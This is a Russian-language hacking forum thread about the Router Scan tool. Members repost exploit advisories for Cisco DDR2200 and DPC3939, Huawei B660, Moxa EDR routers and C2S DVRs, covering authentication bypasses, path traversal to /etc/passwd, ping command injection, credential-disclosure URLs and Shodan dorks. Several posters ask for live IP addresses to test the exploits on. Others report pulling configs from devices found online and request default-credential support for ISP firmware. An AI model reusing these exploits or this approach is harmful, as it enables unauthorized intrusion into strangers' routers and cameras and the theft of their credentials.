прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    И при чем тут RS? Это можно сделать vistumbler + usb gps. Сам так делал, точки определяются на карте с уровнем сигналов, в инете есть инструкция по настройке связки.
     
    sha9 likes this.
  2. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    У @Fusix была идея прикрутить подобную функцию к Android приложению 3WiFi. Если он это сделает, то есть смысл поручить ему добавление этой же функциональности в RS.

    Правда вестей от него давно нет на эту тему.
     
    Triton_Mgn and sha9 like this.
  3. gaww

    gaww New Member

    Joined:
    17 Apr 2017
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    У меня тоже самое с этим tp link 722n, редко но бывает. Это точно из за него.
     
  4. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    интересный эксплойт на Cisco DDR2201
    *Issue Description*
    Some of Cisco DDR2200 router series, show some vulnerabilities as, authentication bypass, Remote code execution and path traversal

    As a result, an attacker can gain access to the router configuration, access to internal files and a limited command execution.

    *Shodan Dork*
    http.title:"Cisco DDR2201v1 ADSL2+ Residential Gateway"
    http.title:"Cisco DDR2200 ADSL2+ Residential Gateway"

    *Affected Components*
    *Device*: Cisco DDR2201v1 ADSL2+ Residential Gateway
    *Software Version*: DDR2201v1-NA-AnnexA-FCC-V00.00.03.28.3
    Path TraversalA A A
    Bypass Authentication
    Remote code execution (RCE)

    *Device*: Cisco DDR2200 ADSL2+ Residential Gateway
    *Software Version*: DDR2200B-NA-AnnexA-FCC-V00.00.03.45.4E
    Remote code execution (RCE)
    Path TraversalA A A

    *Vulnerabilities details*
    Bypass Authentication
    Some pages donat need the user to be authenticated to gain access
    http://192.168.0.1:8080/info.html
    http://192.168.0.1:8080/wancfg.cmd?action=view
    http://192.168.0.1:8080/rtroutecfg.cmd?action=view
    http://192.168.0.1:8080/arpview.cmd
    http://192.168.0.1:8080/cpuview.cmd
    http://192.168.0.1:8080/memoryview.cmd
    http://192.168.0.1:8080/statswan.cmd
    http://192.168.0.1:8080/statsatm.cmd
    http://192.168.0.1:8080/scsrvcntr.cmd?action=view
    http://192.168.0.1:8080/scacccntr.cmd?action=view
    http://192.168.0.1:8080/logview.cmd
    http://192.168.0.1:8080/voicesipview.cmd
    http://192.168.0.1:8080/voicesipview.cmd?view=advanced
    http://192.168.0.1:8080/usbview.cmd
    http://192.168.0.1:8080/wlmacflt.cmd?action=view
    http://192.168.0.1:8080/wlwds.cmd
    http://192.168.0.1:8080/wlstationlist.cmd
    http://192.168.0.1:8080/HPNAShow.cmd
    http://192.168.0.1:8080/HPNAView.cmd
    http://192.168.0.1:8080/qoscls.cmd?action=view
    http://192.168.0.1:8080/qosqueue.cmd?action=view
    http://192.168.0.1:8080/portmap.cmd
    http://192.168.0.1:8080/scmacflt.cmd?action=view
    http://192.168.0.1:8080/scinflt.cmd?action=view
    http://192.168.0.1:8080/scoutflt.cmd?action=view
    http://192.168.0.1:8080/certlocal.cmd?action=view
    http://192.168.0.1:8080/certca.cmd?action=view
    http://192.168.0.1:8080/waitPingqry.cgi
    http://192.168.0.1:8080/PingMsg.cmd

    *Path Traversal*
    The page used to download the configuration file, is vulnerable to path traversal, that allow an attacker to download any system file.
    http://192.168.0.1:8080/download.conf?filename=/etc/passwd

    *Remote code execution (RCE)*
    *Description*
    The ping function allows arbitrary code execution. Just add a ; and then the full path of a binary:
    http://192.168.0.1:8080/waitPingqry.cgi?showPingResult=1&pingAddr=;/bin/ls
    After the previous request finish, just access the follow page to see the output
    http://192.168.0.1:8080/PingMsg.cmd

    но что-то не получается найти дорк на шодане для эксперимента. никому не попадался случайно такой роутер? если есть адресок-было-бы интересно проверить...
     
    Upsurt, Kakoluk, Triton_Mgn and 3 others like this.
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Судя по адресам страниц, это прошивка на базе Micro DSL.

    Следовательно искать по Server: micro_httpd
     
    Triton_Mgn and sha9 like this.
  6. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    Triton_Mgn, binarymaster and sha9 like this.
  7. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    спасибо за помощь. то, что в описании эксплойта указан дорк я видел. видимо неправильно выразился. почему-то у меня он на шодане не срабатывал. ничего не выдавал по запросу.
    по этому запросу тоже искал. нашел парочку, но видимо что-то не то. конфиг скачивает, а в конфиге только парочка html тегов :( в тех айпишиках, что нашел exet все намного лучше :)
     
    exzet likes this.
  8. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    прикольный эесплойт на роутер Huawei Flybox B660.
    Document Title:
    ===============
    Huawei Flybox B660 3G/4G Router - Auth Bypass Vulnerability


    References (Source):
    ====================
    https://www.vulnerability-lab.com/get_content.php?id=2010

    Huawei ID: 558969357627813


    Release Date:
    =============
    2016-11-18

    Vulnerability Laboratory ID (VL-ID):
    ====================================
    2010
    Common Vulnerability Scoring System:
    ====================================
    7.4
    Product & Service Introduction:
    ===============================
    The Huawei B660 has a web interface for configuration. You can use any web browser you like to login to the Huawei B660.

    Abstract Advisory Information:
    ==============================
    The vulnerability laboratory core research team discovered a security flaw that affects the official Huawei Flybox B660 3g/4g router product series.


    Vulnerability Disclosure Timeline:
    ==================================
    2016-11-18: Public Disclosure (Vulnerability Laboratory)


    Discovery Status:
    =================
    Published


    Affected Product(s):
    ====================
    Huawei
    Product: Flybox - Router (Web-Application) B660 3G/4G


    Exploitation Technique:
    =======================
    Remote


    Severity Level:
    ===============
    Critical


    Technical Details & Description:
    ================================
    A remote auth bypass vulnerability has been discovered in the official Huawei Flybox B660 3g/4g router product series.
    The security vulnerability allows remote attackers to compromise any Huawei Flybox B660
    Admin Panel using a new a bypass method.

    The vulnerability is located in the `./htmlcode/html/` modules and `indexdefault.asp ` file of
    localhost path URL. Remote attackers are able to compromise any Huawei Flybox B660 admin panel
    via unauthenticated GET method request.

    The security risk of the issue is estimated as critical with a cvss count of 7.4. (CVSS 7.4)
    Exploitation of the web vulnerability requires no privileged account or user interaction.
    Successful exploitation of the vulnerability results in compromise of the huawei flybox device.

    Request Method(s):
    [+] GET

    Vulnerable Module(s):
    [+] /htmlcode/html/

    Vulnerable File(s):
    [+] indexdefault.asp


    Software version of the modem:
    1066.12.15.01.200

    Hardware version of the modem:
    WLB3TCLU

    Name of the device:
    B660

    Hardware version of the router:
    WL1B660I001

    Software version of the router:
    1066.11.15.02.110sp01


    Proof of Concept (PoC):
    =======================
    The vulnerability can be exploited by remote attackers without privileged user account or user interaction.
    For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

    After buying a Flybox Huawei B660, the company setup a password for you like: "admin", "12345" or "55555"
    We figured out that when you lose your password, you can perform to connect multiple times by using the plain passwords above.
    After the third request the connection will be refused by an exception message, by intercepting the request and passing the error
    it is possible to bypass the authentication mechanism of the 3g/4g router device. The problem in Flybox Huawei B660 is the following,
    there is no test if the password false or true. If an attacker tries the false password of many times on requests they redirect you
    after the bypass of the error to change your password permanently.


    --- PoC Session Logs [GET] ---
    GET /htmlcode/html/contentdefault.asp HTTP/1.1
    Host: localhost
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate, lzma, sdch
    Accept-Language: en-US,en;q=0.8
    Cookie: login_url=settings; CNZZDATA1260483764=1049902387-1478277586-%7C1478277586; Basic=index; Language=en; SessionID_R3=1006428909
    Referer: http://localhost/htmlcode/html/content.asp
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36 OPR/41.0.2353.46
    HTTP/1.1 200 OK
    CACHE-CONTROL: no-cache
    Content-Length: 5776
    Content-Type: text/html


    PoC Video:
    на видео интересно выглядит. посмотрим на практике. буду пробовать.может кто еще заинтересуется.;):)

    п.с. этот эксплойт напоминает один старый айтишный анекдот
    чукотский хакер взломал анб. техника атаки -вводил пароль админ:админ до тех пор, пока сервер с ним не согласился :D
     
    #4228 sha9, 29 Jul 2017
    Last edited: 29 Jul 2017
    Upsurt, Kakoluk, Triton_Mgn and 3 others like this.
  9. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    эксплойт на moxa Industrial Secure Routers
    Title: Industrial Secure Routers - Insecure Configuration Management
    Type: Local/Remote
    Author: Nassim Asrir
    Author Company: HenceForth
    Impact: Insecure Configuration Management
    Risk: (4/5)
    Release Date: 22.10.2016

    Summary:
    Moxa's EDR series industrial Gigabit-performance secure routers are designed to protect the control networks of critical facilities while maintaining fast data transmissions.
    The EDR series security routers provides integrated cyber security solutions that combine industrial firewall, VPN, router, and L2 switching* functions into one product specifically
    designed for automation networks,which protects the integrity of remote access and critical devices.

    description:

    Using this Vulnerability we can change the Admin configuration without knowing Password & Username

    Because the form for change the configurations is Insecure.

    Vendor:
    http://www.moxa.com/product/Industrial_Secure_Routers.htm

    Affected Version:
    EDR-810, EDR-G902 and EDR-G903

    Tested On:
    Linux // Dist (Bugtraq 2)

    Vendor Status:
    I told them and i wait for the answer.

    PoC:
    - when you navigate the server automatically you redirect to the login page (http://site/login.asp).

    - so Just add in the end of URL (admin.htm) then you get the Form to change the Admin configurations.

    пример

    в шодане нашел по запросу-EDR-G902

    п.с. кого интересует тема айпикамер.
    эксплойт на C2S DVR (если баян-прошу простить).
    1. Advisory Information
    ========================================
    Title : C2S DVR Management Remote Credentials Disclosure & Authentication Bypass
    Vendor Homepage : http://www.cash2s.com/en/
    Remotely Exploitable : Yes
    Tested on Camera types : IRDOME-II-C2S, IRBOX-II-C2S, DVR
    Vulnerabilities : Credentials Disclosure
    + : Authentication bypass
    Date : 19/08/2016
    Shodan Dork : html:write.cgi "Content-length: 2676"
    Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)


    2. CREDIT
    ========================================
    This vulnerability was identified during penetration test by Yakir Wizman.


    3. Description
    ========================================
    C2S DVR allows to unauthenticated user disclose the username & password remotely by simple request to the server page 'read.cgi?page=2' which can be made by browser or burp/fiddler.
    Moreover, an attacker could easily access to password change page without any authentication, thats happen cuase the web application does not perform any session management.


    4. Proof-of-Concept:
    ========================================
    Remote Credentials Disclosure:
    -----------------------------------------------
    Simply go to the following url to read the credentials:
    http://host:port/cgi-bin/read.cgi?page=2

    Should return some javascript variable which contain the credentials and other configuration vars:

    var pw_enflag = "1";
    var pw_adminpw = "12345";
    var pw_retype1 = "12345";
    var pw_userpw = "56789";
    var pw_retype2 = "56789";
    var pw_autolock = "0";


    Login @ http://host:port/
    -----------------------------------------------


    Authentication Bypass:
    -----------------------------------------------
    The application does not require a valid session for any page on the server, for example you can access to 'password.htm' which allows you to change/disclose the admin password with just a few clicks.

    http://host:port/password.htm?parm1=&parm2=1

    пример
     
    #4229 sha9, 29 Jul 2017
    Last edited: 29 Jul 2017
  10. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    Может ошибка при копировании дорка была? Там если первый или последний символ отсутствует, то ничего не найдет, точнее выдаст ошибку. А так все находит, только очень много протухших айпи.
     
    sha9 likes this.
  11. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    да.потом разобрался.лишний пробел воткнул и не заметил :) а айпишников действительно много протухших. вот искал парочку айпишников проверить сплойт на роутер белл(такое старое дсл-г...) и вестерн дигитал айклод.нашел только в индии и ни один айпишник не отвечает :mad::)
     
    #4231 sha9, 30 Jul 2017
    Last edited: 30 Jul 2017
    exzet likes this.
  12. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    Прошу добавить определение для новой прошивки(Ростелеком) Huawei HG8245H.
    У всех пара root:admin
    https://yadi.sk/d/wX-7y6us3La3FV

    И посмотреть QTECH QBR-1041WU MTS. (engineer:amplifier:...:161)
    Прошивки одни и те же, вплоть до даты/времени, но не определяются:
    https://yadi.sk/d/1VNpG2fi3LaA9k
     
    #4232 Kakoluk, 31 Jul 2017
    Last edited: 31 Jul 2017
  13. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    to binarymaster. Жаль что поддержку графической капчи на ZTE ZXHN H168N V3.1 не ввели. :(
    Смотрел на диапазонах прова(решил упоротся проверкой вручную, проверил около 50-ти случайной выборкой). ~каждый 5-7-мой девайс, - с дефолтной парой. А их так много(!).
     
    sha9 likes this.
  14. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    свежнький эксплойт на циско DPC3939. для роутерскана не годится, но в локалке вроде работает. может кому сгодится для общей информации ;):)

    Bastille Tracking Number 22
    CVE-2017-9479
    Overview
    A vulnerability has been discovered that enables an attacker to launch applications on a gateway as a root user. This vulnerability can be exploited by an attacker connected to the LAN, private Wi-Fi AP, or Xfinity Home Security AP.
    Affected Platforms
    Cisco DPC3939, firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST
    Proof-of-Concept
    The syseventd service provides a mechanism to launch applications on the gateway in response to certain events, such as the one-minute cron job firing. The sysevent command line application is used to communicate with the syseventd server, which is open on port 52378 to the LAN, private Wi-Fi AP, and Xfinity Home Security Wi-Fi AP.
    An attacker on one of the above networks can take advantage of this, using the sysevent command line application to launch applications on the gateway.
    The following two commands, when executed from a computer connected to an Xfinity Home Security Wi-Fi AP, will cause the persistent storage configuration data to be copied to /var/IGD/. This can then be retrieved by the attacker.
    ./sysevent --port 52367 --ip 172.16.12.1 async </path/to/file> /bin/cp
    ./sysevent --port 52367 --ip 172.16.12.1 set </path/to/file> /var/IGD/<file>
    Test Environment
    Cisco DPC3939, firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST
    Mitigation
    There is no apparent mechanism to allow Comcast customers to disable syseventd access.
    Recommended Remediation
    Update the firewall rules to disable access to syseventd from the LAN, private Wi-Fi AP, and Xfinity Home Security Wi-Fi AP.
    Credits
    Marc Newlin and Logan Lamb, Bastille
    Chris Grayson, Web Sight.IO
     
    Triton_Mgn likes this.
  15. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    А то! :rolleyes:
     
    sha9, Veil and Triton_Mgn like this.
  16. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    Ждем офф релиз с хелпом, чтобы не задавать вопросов .
     
    sha9, Kakoluk, Veil and 3 others like this.
  17. gentux

    gentux Member

    Joined:
    28 Jul 2010
    Messages:
    78
    Likes Received:
    55
    Reputations:
    0
    Kolhozan likes this.
  18. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    sha9, Kakoluk, Veil and 2 others like this.
  19. Paradiz

    Paradiz Member

    Joined:
    7 Mar 2017
    Messages:
    98
    Likes Received:
    5
    Reputations:
    0
    [​IMG]
    [​IMG]
    Что значат эти ошибки не могу загрузить результат сканирования на 3wifi
     
  20. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    Увидеть могут(особенно те, кто напрямую подключен), но под статью не попадает.
     
    sha9 and uzeerpc like this.